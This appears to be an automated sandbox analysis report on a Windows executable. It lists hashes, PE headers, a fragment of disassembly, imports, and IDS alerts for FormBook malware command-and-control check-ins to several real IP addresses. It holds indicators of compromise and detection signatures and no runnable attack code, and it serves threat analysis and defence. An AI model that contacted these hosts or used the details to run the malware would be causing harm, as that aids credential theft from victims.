                                                                            Preview:.i.j.OTQ3n.>....UN....RN...3X8AOTQ36PW7ORRR95UM0W29QFQ5H3.8AOZN.8P.>.s.Su.t.X>A.!4>R:R5.".:?\Bp5Ro '<.\;mt.a.<)5Pf>U2eOTQ36PWNN[.oYR.pP0..1!./..!(.K...kW(.H...i-W.`P2.lU/.X8AOTQ36..7O.SS9..^nW29QFQ5H.X:@DUZ36.S7ORRR95UM.C29QVQ5HC\8AO.Q3&PW7MRRT95UM0W2?QFQ5H3X81KTQ16PW7ORPRy.UM W2)QFQ5X3X(AOTQ36@W7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29Qh%P0GX8A..U36@W7O.VR9%UM0W29QFQ5H3X8aOT136PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7O
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.5185020842525345
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                            • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:r6lOHDg9N9.exe
                                                                            File size:1'339'905 bytes
                                                                            MD5:9f65c6e2192cc6757c1e7be556a4bc9a
                                                                            SHA1:c3f40bc0b721df2ac07997098ef6d9a8a8b4d290
                                                                            SHA256:bd12b7917d9fcc7512fa18d3546d728ec21c418f48a64333ec824937bd5b76c1
                                                                            SHA512:23c0b19323fea6ea5ee628d422c58404459a1feae442d78799dbfc2d5eb6b51ff8a21c80aac17e614fe82f893101436826191ca3dff99963259df625fb7bbf0f
                                                                            SSDEEP:24576:ffmMv6Ckr7Mny5QLF0H8hFCzhMUiQMC2XirYCcH/9ddSFi4YbXWTc:f3v+7/5QLLFCz+UV42YvH/97/ec
                                                                            TLSH:9555F112B7D680B2E9A339712977E327EB3576194327C4CBA7E02F768F211119B36361
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                                            Icon Hash:1733312925935517
                                                                            Entrypoint:0x416310
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:0
                                                                            File Version Major:5
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                                            Instruction
                                                                            call 00007F6FBCEC625Ch
                                                                            jmp 00007F6FBCEBA02Eh
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push edi
                                                                            push esi
                                                                            mov esi, dword ptr [ebp+0Ch]
                                                                            mov ecx, dword ptr [ebp+10h]
                                                                            mov edi, dword ptr [ebp+08h]
                                                                            mov eax, ecx
                                                                            mov edx, ecx
                                                                            add eax, esi
                                                                            cmp edi, esi
                                                                            jbe 00007F6FBCEBA1BAh
                                                                            cmp edi, eax
                                                                            jc 00007F6FBCEBA35Ah
                                                                            cmp ecx, 00000100h
                                                                            jc 00007F6FBCEBA1D1h
                                                                            cmp dword ptr [004A94E0h], 00000000h
                                                                            je 00007F6FBCEBA1C8h
                                                                            push edi
                                                                            push esi
                                                                            and edi, 0Fh
                                                                            and esi, 0Fh
                                                                            cmp edi, esi
                                                                            pop esi
                                                                            pop edi
                                                                            jne 00007F6FBCEBA1BAh
                                                                            pop esi
                                                                            pop edi
                                                                            pop ebp
                                                                            jmp 00007F6FBCEBA61Ah
                                                                            test edi, 00000003h
                                                                            jne 00007F6FBCEBA1C7h
                                                                            shr ecx, 02h
                                                                            and edx, 03h
                                                                            cmp ecx, 08h
                                                                            jc 00007F6FBCEBA1DCh
                                                                            rep movsd
                                                                            jmp dword ptr [00416494h+edx*4]
                                                                            nop
                                                                            mov eax, edi
                                                                            mov edx, 00000003h
                                                                            sub ecx, 04h
                                                                            jc 00007F6FBCEBA1BEh
                                                                            and eax, 03h
                                                                            add ecx, eax
                                                                            jmp dword ptr [004163A8h+eax*4]
                                                                            jmp dword ptr [004164A4h+ecx*4]
                                                                            nop
                                                                            jmp dword ptr [00416428h+ecx*4]
                                                                            nop
                                                                            mov eax, E4004163h
                                                                            arpl word ptr [ecx+00h], ax
                                                                            or byte ptr [ecx+eax*2+00h], ah
                                                                            and edx, ecx
                                                                            mov al, byte ptr [esi]
                                                                            mov byte ptr [edi], al
                                                                            mov al, byte ptr [esi+01h]
                                                                            mov byte ptr [edi+01h], al
                                                                            mov al, byte ptr [esi+02h]
                                                                            shr ecx, 02h
                                                                            mov byte ptr [edi+02h], al
                                                                            add esi, 03h
                                                                            add edi, 03h
                                                                            cmp ecx, 08h
                                                                            jc 00007F6FBCEBA17Eh
                                                                            Programming Language:
                                                                            • [ASM] VS2008 SP1 build 30729
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [C++] VS2008 SP1 build 30729
                                                                            • [ C ] VS2005 build 50727
                                                                            • [IMP] VS2005 build 50727
                                                                            • [ASM] VS2008 build 21022
                                                                            • [RES] VS2008 build 21022
                                                                            • [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8cd3c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9298 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x840 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x80017 | 0x80200 | 6c20c6bf686768b6f134f5bd508171bc | False | 0.5602991615853659 | data | 6.634688230255595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xd95c | 0xda00 | f979966509a93083729d23cdfd2a6f2d | False | 0.36256450688073394 | data | 4.880040824124099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a518 | 0x6800 | e5d77411f751d28c6eee48a743606795 | False | 0.1600060096153846 | data | 2.2017649896261107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9298 | 0x9400 | f6be76de0ef2c68f397158bf01bdef3e | False | 0.4896801097972973 | data | 5.530303089784181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x43a | data | English | Great Britain | 0.3733826247689464
RT_STRING | 0xb2c78 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3278 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb38d8 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3c60 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3db8 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3e40 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3e58 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3e70 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3e88 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb4028 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll | DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll | SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-05T15:22:20.383399+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-05T15:22:51.689391+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.4 | 55453 | TCP
2024-11-05T15:22:56.464517+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 55454 | 154.23.184.60 | 80 | TCP
2024-11-05T15:22:56.464517+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 55454 | 154.23.184.60 | 80 | TCP
2024-11-05T15:23:20.484708+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55564 | 209.74.95.29 | 80 | TCP
2024-11-05T15:23:23.026740+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55578 | 209.74.95.29 | 80 | TCP
2024-11-05T15:23:25.564381+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55594 | 209.74.95.29 | 80 | TCP
2024-11-05T15:23:28.155331+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 55609 | 209.74.95.29 | 80 | TCP
2024-11-05T15:23:28.155331+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 55609 | 209.74.95.29 | 80 | TCP
2024-11-05T15:23:34.284729+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55644 | 136.143.186.128 | 80 | TCP
2024-11-05T15:23:36.834522+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55659 | 136.143.186.128 | 80 | TCP
2024-11-05T15:23:39.407521+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55674 | 136.143.186.128 | 80 | TCP
2024-11-05T15:23:41.940689+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 55686 | 136.143.186.128 | 80 | TCP
2024-11-05T15:23:41.940689+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 55686 | 136.143.186.128 | 80 | TCP
2024-11-05T15:23:48.464607+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55722 | 133.130.35.90 | 80 | TCP
2024-11-05T15:23:51.027181+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55729 | 133.130.35.90 | 80 | TCP
2024-11-05T15:23:53.581375+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55730 | 133.130.35.90 | 80 | TCP
2024-11-05T15:23:56.136508+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 55731 | 133.130.35.90 | 80 | TCP
2024-11-05T15:23:56.136508+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 55731 | 133.130.35.90 | 80 | TCP
2024-11-05T15:24:01.885452+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55732 | 3.33.130.190 | 80 | TCP
2024-11-05T15:24:05.324202+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55733 | 3.33.130.190 | 80 | TCP
2024-11-05T15:24:07.009732+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55734 | 3.33.130.190 | 80 | TCP
2024-11-05T15:24:09.525201+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 55735 | 3.33.130.190 | 80 | TCP
2024-11-05T15:24:09.525201+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 55735 | 3.33.130.190 | 80 | TCP
2024-11-05T15:24:15.620966+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55736 | 31.31.196.17 | 80 | TCP
2024-11-05T15:24:18.167829+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55737 | 31.31.196.17 | 80 | TCP
2024-11-05T15:24:20.714806+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55738 | 31.31.196.17 | 80 | TCP
2024-11-05T15:24:23.261899+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 55739 | 31.31.196.17 | 80 | TCP
2024-11-05T15:24:23.261899+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 55739 | 31.31.196.17 | 80 | TCP
2024-11-05T15:24:29.154609+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55740 | 172.96.187.60 | 80 | TCP
2024-11-05T15:24:31.721130+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55741 | 172.96.187.60 | 80 | TCP
2024-11-05T15:24:34.222625+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55742 | 172.96.187.60 | 80 | TCP
2024-11-05T15:24:36.778518+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 55743 | 172.96.187.60 | 80 | TCP
2024-11-05T15:24:36.778518+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 55743 | 172.96.187.60 | 80 | TCP
2024-11-05T15:24:42.790343+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55744 | 161.97.142.144 | 80 | TCP
2024-11-05T15:24:45.557370+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55745 | 161.97.142.144 | 80 | TCP
2024-11-05T15:24:48.166703+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55746 | 161.97.142.144 | 80 | TCP
2024-11-05T15:24:50.689017+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 55747 | 161.97.142.144 | 80 | TCP
2024-11-05T15:24:50.689017+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 55747 | 161.97.142.144 | 80 | TCP
2024-11-05T15:24:56.545697+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55748 | 13.248.169.48 | 80 | TCP
2024-11-05T15:24:59.100062+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 55749 | 13.248.169.48 | 80 | TCP
